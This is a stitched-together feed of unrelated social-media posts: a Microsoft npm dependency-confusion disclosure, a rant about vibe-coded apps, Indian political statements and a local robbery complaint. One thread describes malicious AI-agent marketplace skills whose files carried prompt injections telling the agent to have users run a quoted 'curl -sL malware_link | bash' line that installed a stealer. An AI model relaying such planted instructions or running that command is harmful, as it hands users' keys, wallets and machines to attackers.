Microsoft has uncovered a supply chain attack involving malicious npm packages registered under organizational scopes that mirror real internal corporate namespaces, employing dependency confusion technique to deploy a reconnaissance payload. https://t.co/z2GjRIAyYS
A threat actor operating under three maintainer aliases, mr.4nd3r50n, ce-rwb, and t-in-one, published malicious packages that impersonate internal corporate packages, with several spoofing internal enterprise infrastructure URLs in their package.json to appear legitimate.
Once installed, the packages download and execute an obfuscated payload from an attacker-controlled command-and-control (C2) server to collect system information, hostnames, environment variables, and developer context. Read the blog for in-depth analysis and mitigation, detection, and hunting details.
This is what I've been saying since starting Socket in 2020. You need to look at what the code actually does.
Signing and provenance are a bit helpful and definitely not sufficient
AI will not solve cybersecurity! “With the recent news of folks finding vulnerabilities left and right using LLMs, some folks hope that we'd be able to find every single vulnerability. Today, I hope to shatter that idea” https://t.co/fDokoW9VuL
vibecoder asks claude code to build a chat app, gets a working prototype in 20 minutes, immediately tweets "just killed slack and discord"…
brother you don't even know what a distributed system is. you don't know what database replication means. you have no idea how websocket connections behave at scale or what happens when 50k people are online at once and someone's message needs to show up in 200ms across 3 continents
slack has engineers making $300k+ who have spent a decade solving problems you don't even know exist yet. race conditions, eventual consistency, message ordering, presence systems, file storage at scale, search indexing across billions of messages
your app works on localhost with 2 connections. that's not the same thing as "killing slack" that's a college homework assignment
the prototype is maybe 0.5% of what makes these products actually work in production. the remaining 99.5% is infrastructure, reliability, edge cases, and years of iteration on problems that only surface when real humans use your thing at scale
and the worst part is the confidence. "yeah its not perfect but ai one-shotted it, just need to adjust a few things and deploy" - the few things you need to adjust IS the entire product. thats like pouring a foundation and saying you basically built a skyscraper, just need to adjust a few things
ai is genuinely incredible for building tools and prototypes. i use it every day. but there's this weird thing happening where people who have never shipped anything to real users at scale now think the hard part of software is writing the first 200 lines of code
it never was bro
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life
Prediction time:
Tools that can scan code bases for security issues and vulnerabilities will become essential and very lucrative in the next few years as vibe coding becomes more mainstream
India and the US are close friends and natural partners. I am confident that our trade negotiations will pave the way for unlocking the limitless potential of the India-US partnership. Our teams are working to conclude these discussions at the earliest. I am also looking forward to speaking with President Trump. We will work together to secure a brighter, more prosperous future for both our people.
@realDonaldTrump@POTUS
I thank Prime Minister @netanyahu for his phone call and providing an update on the ongoing situation. People of India stand firmly with Israel in this difficult hour. India strongly and unequivocally condemns terrorism in all its forms and manifestations.
@ArvindKejriwal high scale robery in your region on Monday. Multi million worth of jewellery stolen. The investigation is too damm slow. @PunjabPoliceInd@DGPPunjabPolice please prioritize this. People are scared in community. Details already shared with police.
#punjab#thief